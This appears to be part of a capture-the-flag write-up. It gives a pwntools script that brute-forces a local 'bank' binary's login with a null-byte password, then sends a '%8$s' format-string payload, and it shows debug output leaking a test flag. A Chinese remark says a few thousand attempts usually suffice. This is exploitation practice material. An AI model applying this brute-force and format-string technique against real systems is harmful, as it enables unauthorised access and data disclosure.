from pwn import* context.log_level='debug' whileTrue: r = process('./bank') try: r.sendlineafter('account:','halo') r.sendlineafter('password:','\x00') r.recvuntil('Do you want to check your account balance?') r.sendline('yes') #gdb.attach(r,"b *0x4014C1") break except: r.close() continue
r.sendlineafter('Please input your private code: ','%8$s')
r.interactive()
结果如下,一般运气不好也就爆破的几千次,对于这种短脚本执行是很快的。
1 2 3 4 5 6 7 8
[*] Process './bank' stopped with exit code 0 (pid 3728) [DEBUG] Received 0x37 bytes: 'Your input is: flag{1111}\n' '\n' '\n' 'Your private code is wrong!' Your input is: flag{1111}